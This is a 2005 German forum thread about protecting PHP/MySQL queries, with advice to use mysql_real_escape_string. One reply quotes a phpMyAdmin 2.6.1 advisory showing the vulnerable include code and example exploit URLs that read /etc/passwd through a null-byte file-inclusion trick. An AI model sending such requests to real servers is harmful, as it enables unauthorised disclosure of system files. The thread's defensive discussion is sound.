 |
|
|
Themen-Optionen |
06.10.2005, 15:28
|
Nach oben #1 |
|
o_O
Registriert seit: 18.08.2005
Ort: Essen
Beiträge: 159
|
MySql Abfrage/verbindung sicher machen
Hallo,
ich hab ne ganz einfache Frage, mit welchen Funktionen kann ich meine Abfrage in MySql so sicher wie möglich machen? Also, das nich jedes Script Kiddie etwas anstellen könnte. Ich hoffe Ihr wisst was ich grundlegendes meine  .Gruss bob
__________________
Grüsse aus Essen, bob |
|
   
|
|
07.10.2005, 16:22
|
Nach oben #3 |
|
Neuer Benutzer
Registriert seit: 18.08.2005
Beiträge: 2
|
Am besten gleich auf alle Daten, die du mit einer Datenbank verwendest (einfügen, abfragen, etc.), die Funktion auf der php.net Seite unter Punkt 3 verwenden: http://www.php.net/manual/en/functio...ape-string.php
Dann ist auch die Einstellung des Servers nicht mehr wichtig. mfg RudiS
__________________
Kunst kommt von Können und nicht von wollen, denn sonst würde es ja Wunst heißen. |
|
|
|
|
07.10.2005, 16:36
|
Nach oben #4 |
|
Projektleiter
Registriert seit: 02.12.2004
Ort: Wildeshausen
Beiträge: 2.212
|
danke für den link!
__________________
Umfragen:  bitte beachten: Vorschläge für künftige Umfragen Woher weißt du vom developers-guide?Wenn du dich in ein interessantes Thema eingearbeitet hast, dann lass andere daran teilhaben! Schreibe ein Tutorial und beschreibe, wie es geht, was nicht klappt, wo man aufpassen muss usw.Danke! |
|
|
|
|
07.10.2005, 23:35
|
Nach oben #5 |
|
Benutzer
Registriert seit: 07.05.2005
Ort: nähe Münster
Beiträge: 33
|
__________________
http://redRogi.de |
|
|
|
|
12.10.2005, 13:15
|
Nach oben #6 |
|
o_O
Registriert seit: 18.08.2005
Ort: Essen
Beiträge: 159
|
Schonmal rechtherzlichen dank!
Also ich verwende jetzt (richtig, nicht wie vorher) mysql_real_escape_string. Das macht das ganze ja schon um einiges sicherer, so wie ich das gelesen hab. Gibt es denn noch wichtige Sachen bei Abfragen bzw. Eintragungen in die DB was zu beachten? Danke!
__________________
Grüsse aus Essen, bob |
|
|
|
|
12.10.2005, 14:52
|
Nach oben #8 |
|
Goldman.de
Registriert seit: 09.10.2005
Ort: Frankfurt am Main
Beiträge: 190
|
hohohoh ....
da jips ganz lecker sachen Date: 24.2.2005 - --- 0.Description --- phpMyAdmin 2.6.1 is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields. - --- 1. Remote file inclusion --- 1.0 This bug exist in css/phpmyadmin.css.php. You can include files. Error exist in ( wobei das ja mehr in richtung a php geht aber ) Code:
$tmp_file = $GLOBALS['cfg']['ThemePath'] . '/' .
$theme . '/css/theme_right.css.php';
if (@file_exists($tmp_file)) {
include($tmp_file);
} // end of include theme_right.css.php
- ------
And now you can get files.
For exemple:
http://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd %00&theme=passwd%00
http ://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=pas swd%00
etc.
.... jupp richtig gehört festhalten und anschnallen remote root aber zurück zum thema: ich bin der auffassung das man ein ausgewogenes verhältniss/umgebung schafft zwischen sicherheit aber auch ein bissel kompfort ( das soll nicht heissen globals on und dann feste nur noch mit extrakt & $$ ) nein aber ein gleichgewicht mfg |
|
|
|
